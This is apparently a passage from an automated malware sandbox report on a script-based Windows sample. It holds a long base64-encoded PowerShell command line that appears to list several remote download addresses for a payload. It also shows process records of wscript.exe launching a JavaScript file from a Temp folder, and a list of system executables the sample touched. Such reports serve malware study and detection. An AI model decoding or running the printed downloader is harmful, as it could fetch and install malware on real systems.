B6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Icuv.js" kickup ostracophorousVoleries | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\Users\test22\AppData\Local\Temp\Icuv.js" kickup ostracophorousVoleries |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |